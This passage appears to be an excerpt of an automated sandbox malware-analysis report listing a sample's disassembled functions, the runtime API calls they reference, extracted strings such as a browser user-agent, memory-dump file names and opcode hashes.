Instruction Fuzzy Hash: 19616B71E042099FDB14DF99DD81AFEBBB8EF88300F144169E945B7350EB719E058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00EB8970, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 00EB8A35

Strings

jz2 , xrefs: 00EB89B7
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36, xrefs: 00EB8A4A
,, xrefs: 00EB89A2, 00EB8A49

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: __aulldiv
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36$jz2 $,
API String ID: 3732870572-2454332767
Opcode ID: e72aa0398cb8e8539558bb670475b9291e9f7fad469ea73687a4d58648bb57f8
Instruction ID: bb25db6ff3d3d5f0a1f453bbcaa49a7b227d41ad39c64903e16f5d4087099421
Opcode Fuzzy Hash: e72aa0398cb8e8539558bb670475b9291e9f7fad469ea73687a4d58648bb57f8
Instruction Fuzzy Hash: DA31A0B5E00219ABDF04CF98C991AEEBBB5EF88314F144169E805B7340D7756E448BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00EAC570, Relevance: 4.7, APIs: 3, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 00EAC617
__aulldiv.LIBCMT ref: 00EAC7A4
__Init_thread_footer.LIBCMT ref: 00EAC841

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: __aulldiv$Init_thread_footer
String ID:
API String ID: 2692724186-0
Opcode ID: b233551e411b0b48259cc8bf7eaf7cd2d5fe7a7674c179a4e7c8d76f47271a36
Instruction ID: 3466f9e4c3d21b3f52257db0ecb53d59b7a1290883bd73e7576efed4af6bda73
Opcode Fuzzy Hash: b233551e411b0b48259cc8bf7eaf7cd2d5fe7a7674c179a4e7c8d76f47271a36
Instruction Fuzzy Hash: 519146B1D012189FDB04CF98D98569EBBB5FF48314F245119E804BB380DB796D0ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E71FA6, Relevance: 4.7, APIs: 3, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0cd3e695fb525e0c38baea7af4872f1be976db3a9ea9f22102173e30a715271
Instruction ID: 43143197e701037783b42a5a0915c25f6c42c3df0af9a71d91d1dac26db5edba
Opcode Fuzzy Hash: d0cd3e695fb525e0c38baea7af4872f1be976db3a9ea9f22102173e30a715271
Instruction Fuzzy Hash: 9B61E171D0120A9FDF20AFA8C845BEEBBB4FF45324F10A55DE608B7291D7758901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E65C2B, Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000009,00000000,00E714FD,00000009,00000000,?,?,?,00E65CDA,00000000,00000000,00000009,00E714FD), ref: 00E65C64
GetLastError.KERNEL32(?,?,?,00E65CDA,00000000,00000000,00000009,00E714FD,?,00E714FD,00000009,00000000,00000000,00000001,00000000,00001000), ref: 00E65C6E
__dosmaperr.LIBCMT ref: 00E65C75

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: cc07c22b18eedc2341cdacbaaa811c458080930613167992d2d3b9225f6d2075
Instruction ID: c7b73a446522c2768379587d042971df30e9e21ef963d5752e1e52cde92f1480
Opcode Fuzzy Hash: cc07c22b18eedc2341cdacbaaa811c458080930613167992d2d3b9225f6d2075
Instruction Fuzzy Hash: 12012433710A18AFCB059F99EC058AFBB29EB85370F240348F865BB291EB71DD519790

Uniqueness

Uniqueness Score: -1.00%

Function 00E6F584, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00E6F65D

Strings

4, xrefs: 00E6F605

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: _free
String ID: 4
API String ID: 269201875-1614143912
Opcode ID: 8b5079f0a48b2f53b49f403181c17b9fbee0664b63d1ec92947be4ad62f067dc
Instruction ID: 2dee176641edc23e3a785072ef3fa8a17824aca297dfb96e2e121118e1d00908
Opcode Fuzzy Hash: 8b5079f0a48b2f53b49f403181c17b9fbee0664b63d1ec92947be4ad62f067dc
Instruction Fuzzy Hash: 0C417F72A002158FCB14CF6DE48055EB7F1EB8C324B2682AAD919FB3A0D730AD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E2FD10, Relevance: 1.7, APIs: 1, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f259a7d9bc9f87c99fec4f032af52f8c539f8bc333b96dc9f53755e657fe171
Instruction ID: 751b08f3baf2d2b1247b428f8afc84c4ab7f61ec3388f106bebb75fdf6669aad
Opcode Fuzzy Hash: 9f259a7d9bc9f87c99fec4f032af52f8c539f8bc333b96dc9f53755e657fe171
Instruction Fuzzy Hash: 5171A372A001158FCB18DF6CD98166EBBF5EF58310F148239E859EB795EB34AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E68839, Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 257243a14a1e42a91572fa04bfc619b20ea881000e85f5927c3aed4448f95886
Instruction ID: 1a873db4b02051ce7fa2eb59755b829ac58bd06adc32bc2a5852dbe268413707
Opcode Fuzzy Hash: 257243a14a1e42a91572fa04bfc619b20ea881000e85f5927c3aed4448f95886
Instruction Fuzzy Hash: D1F02D32541A205ACA35362AFD05B5733D88F413B4F956715F869B31D2DF74D80285D5

Uniqueness

Uniqueness Score: -1.00%

Function 00E75FDE, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E750F6,00000001,00000364,00000006,000000FF,?,?,?,00E680B6,00E75236), ref: 00E7601F

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 495c633496aeb01b9d44f410e2d26370593c78079daf8e4815b31b66b314280f
Instruction ID: dd37973a7c131cbacb5dd5131ea462fb4f1ca6df60623de8e17405e305a473ac
Opcode Fuzzy Hash: 495c633496aeb01b9d44f410e2d26370593c78079daf8e4815b31b66b314280f
Instruction Fuzzy Hash: 61F0B4312009246ADB316A269C05A6B3B98EF447ACB14E121F80CB7190DB60D80086A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E77927, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00E751F3: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E38A82,?,?,00E91F4B), ref: 00E75225

_free.LIBCMT ref: 00E77947

Part of subcall function 00E7494E: RtlFreeHeap.NTDLL(00000000,00000000,?,00E79510,?,00000000,?,00000000,?,00E797B4,?,00000007,?,?,00E79CC5,?), ref: 00E74964
Part of subcall function 00E7494E: GetLastError.KERNEL32(?,?,00E79510,?,00000000,?,00000000,?,00E797B4,?,00000007,?,?,00E79CC5,?,?), ref: 00E74976

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: f7942b8f5e1ae2936e43327db0eb88cb5ec6465c7570b58b06b23ee1e378373e
Instruction ID: 2ef6ad3f9a0ac30c8fa67766877ddc3fb1f490fa759473d2dc30564188b4c780
Opcode Fuzzy Hash: f7942b8f5e1ae2936e43327db0eb88cb5ec6465c7570b58b06b23ee1e378373e
Instruction Fuzzy Hash: EFF062B20067058FE7249F04D841792B7E8EB44715F10842EE29EA7A91CBB4A844CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00E751F3, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00E38A82,?,?,00E91F4B), ref: 00E75225

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0ebc5d2a9de5419519bd52628a22b12d0d888473de3e0a5fac2f27ece2dd03c1
Instruction ID: 9eae9891145627032c1f9e15a75ce0a281f3ab6790fcea150a2d9b39bd93e5d4
Opcode Fuzzy Hash: 0ebc5d2a9de5419519bd52628a22b12d0d888473de3e0a5fac2f27ece2dd03c1
Instruction Fuzzy Hash: 4FE06537241AA46BEB312A659C00B9F36A89B413A4F15A230FD5DB65F2DFE1DC0081E1

Uniqueness

Uniqueness Score: -1.00%

Function 00E68010, Relevance: 1.5, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E68023

Part of subcall function 00E7494E: RtlFreeHeap.NTDLL(00000000,00000000,?,00E79510,?,00000000,?,00000000,?,00E797B4,?,00000007,?,?,00E79CC5,?), ref: 00E74964
Part of subcall function 00E7494E: GetLastError.KERNEL32(?,?,00E79510,?,00000000,?,00000000,?,00E797B4,?,00000007,?,?,00E79CC5,?,?), ref: 00E74976

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 8bc0020bd6d6eb434d53b456f56b995c980212a4450f134f59397c1b2cc82e27
Instruction ID: 90d59471829447619955129fb1fc8057943ca1758cb59e68c8c3c01aaeb2b73b
Opcode Fuzzy Hash: 8bc0020bd6d6eb434d53b456f56b995c980212a4450f134f59397c1b2cc82e27
Instruction Fuzzy Hash: CBC0127140420CBBCB009A89E906A5ABBA8DB80320F204188F80C17240DA72AE109680

Uniqueness

Uniqueness Score: -1.00%

Function 00EB8260, Relevance: 1.3, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,?,00EB823A,?,00EB7DD3,?,00000000,?,00000000,00000000), ref: 00EB8275

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 76380c43957b19e59a1f8f8648ed5a4eca0ab9427396d3709801c91c2058d606
Instruction ID: 8667f2912414ca12f9353cef03350b3ef077bbf47164ade9349b0c28872432de
Opcode Fuzzy Hash: 76380c43957b19e59a1f8f8648ed5a4eca0ab9427396d3709801c91c2058d606
Instruction Fuzzy Hash: FCD0A77625B1540F9E545BBD2D505E32B8D1A5735C35C20DAE4D0FB331D7039C0AE7A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E7ACA4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00E7AFC3,?,00000000), ref: 00E7AD3D
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00E7AFC3,?,00000000), ref: 00E7AD66
GetACP.KERNEL32(?,?,00E7AFC3,?,00000000), ref: 00E7AD7B

Strings

OCP, xrefs: 00E7ACF8
ACP, xrefs: 00E7ACC2

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: f9d40fefebc54fb5bf886345bf6d0661ab81360b2f0741d199c2cafbd20d5f53
Instruction ID: 8c017310c8a22d775cb15b221214902cd75abde37370ed585cd0cbeb77f65f7e
Opcode Fuzzy Hash: f9d40fefebc54fb5bf886345bf6d0661ab81360b2f0741d199c2cafbd20d5f53
Instruction Fuzzy Hash: 3221A132A00105ABD7358F54C901AAFB3A6EBD0B5EB5ED174EA0DFB510E722DD41C392

Uniqueness

Uniqueness Score: -1.00%

Function 00E7AE78, Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E74F52: GetLastError.KERNEL32(00000000,00000000,00E71B83,00000000,0000D8C4,00000000,?,00E72072,0000D8C4,0000D8C4,00000000,0000D8C4), ref: 00E74F56
Part of subcall function 00E74F52: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E72072,0000D8C4,0000D8C4,00000000,0000D8C4), ref: 00E74FFA
Part of subcall function 00E74F52: _abort.LIBCMT ref: 00E75000
Part of subcall function 00E74F52: _abort.LIBCMT ref: 00E7509A

Part of subcall function 00E74F52: _free.LIBCMT ref: 00E74FAD
Part of subcall function 00E74F52: _free.LIBCMT ref: 00E75056

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00E7AF84
IsValidCodePage.KERNEL32(00000000), ref: 00E7AFDF
IsValidLocale.KERNEL32(?,00000001), ref: 00E7AFEE
GetLocaleInfoW.KERNEL32(?,00001001,00E70235,00000040,?,00E70355,00000055,00000000,?,?,00000055,00000000), ref: 00E7B036
GetLocaleInfoW.KERNEL32(?,00001002,00E702B5,00000040), ref: 00E7B055

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_abort_free$CodeDefaultPageUser
String ID:
API String ID: 2649626721-0
Opcode ID: 54b6f845a55cfc64ea203a27f491a3d89951180a6b5b509ca5c107213f2613b9
Instruction ID: 09091726d332ec5349dd674b21f66218af5cbdd2d0e1792db088e7abd00e3380
Opcode Fuzzy Hash: 54b6f845a55cfc64ea203a27f491a3d89951180a6b5b509ca5c107213f2613b9
Instruction Fuzzy Hash: AE5182B2A002069FEF25DFA5CC45ABEB7B8EF84704F489575F908F7190D77099448B62

Uniqueness

Uniqueness Score: -1.00%

Function 00E6BE00, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 469COMMONLIBRARYCODE

Download Yara Rule

Strings

1, xrefs: 00E6C22C, 00E6C242
1, xrefs: 00E6BE1D, 00E6BFCA, 00E6C1F7, 00E6C190, 00E6C018, 00E6BFA6

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID:
String ID: 1$1
API String ID: 0-2114633919
Opcode ID: f52bd4bc0f2dfe4651d983fddb4fc43c2ad49f62e5b8cf1c3224bfbb4b3fc5c8
Instruction ID: 4cc11e3873003fd52e97c18f9da07386c6efc822135a3932009ddf7c8d03f2e1
Opcode Fuzzy Hash: f52bd4bc0f2dfe4651d983fddb4fc43c2ad49f62e5b8cf1c3224bfbb4b3fc5c8
Instruction Fuzzy Hash: 1C025A71E412199FDF14CFA9D8806ADBBF1EF48354F258269E819F7381D731AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E7A540, Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E74F52: GetLastError.KERNEL32(00000000,00000000,00E71B83,00000000,0000D8C4,00000000,?,00E72072,0000D8C4,0000D8C4,00000000,0000D8C4), ref: 00E74F56
Part of subcall function 00E74F52: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E72072,0000D8C4,0000D8C4,00000000,0000D8C4), ref: 00E74FFA
Part of subcall function 00E74F52: _abort.LIBCMT ref: 00E75000
Part of subcall function 00E74F52: _abort.LIBCMT ref: 00E7509A

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00E7023C,?,?,?,?,00E6FDCC,?,00000000), ref: 00E7A622
_wcschr.LIBVCRUNTIME ref: 00E7A6B2
_wcschr.LIBVCRUNTIME ref: 00E7A6C0
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00E7023C,00000000,00E7035C), ref: 00E7A763

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: ErrorLast_abort_wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 3999925676-0
Opcode ID: 13150ed64cb24da61c248ff78024defefcb7c8bb5e000428845599e1051328e5
Instruction ID: 1c58d2a2d3e86b0408a3a2226f1df10bc76d3e9b059d7aa4d06011e2859a7234
Opcode Fuzzy Hash: 13150ed64cb24da61c248ff78024defefcb7c8bb5e000428845599e1051328e5
Instruction Fuzzy Hash: 5461F972600306AAD728AB75DC42ABE73E8EF84714F18957AF50DF7181EB70ED418761

Uniqueness

Uniqueness Score: -1.00%

Function 00E619A5, Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 339COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00E61A72
DName::operator+.LIBCMT ref: 00E61AAF
DName::DName.LIBVCRUNTIME ref: 00E61AC3
DName::operator+.LIBCMT ref: 00E61AD2
DName::operator+.LIBCMT ref: 00E61B60
DName::operator|=.LIBCMT ref: 00E61B7C
DName::DName.LIBVCRUNTIME ref: 00E61B88
DName::operator+.LIBCMT ref: 00E61B96
DName::operator+.LIBCMT ref: 00E61BD0
DName::operator+.LIBCMT ref: 00E61C11
UnDecorator::getReturnType.LIBCMT ref: 00E61C41
operator+.LIBVCRUNTIME ref: 00E61D4E

Strings

', xrefs: 00E61B79, 00E61C87
`#, xrefs: 00E61C23
`", xrefs: 00E61A6C, 00E61A6F

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
String ID: '$`"$`#
API String ID: 1186856153-2747161097
Opcode ID: 4974e99b00f0341df3c205861bd9b3ea88abe40883cd44626c5834cec510168b
Instruction ID: 0b122646382549e85af0a180f38d4abefd0abae2ad9d34c6554c3edc5fe10bca
Opcode Fuzzy Hash: 4974e99b00f0341df3c205861bd9b3ea88abe40883cd44626c5834cec510168b
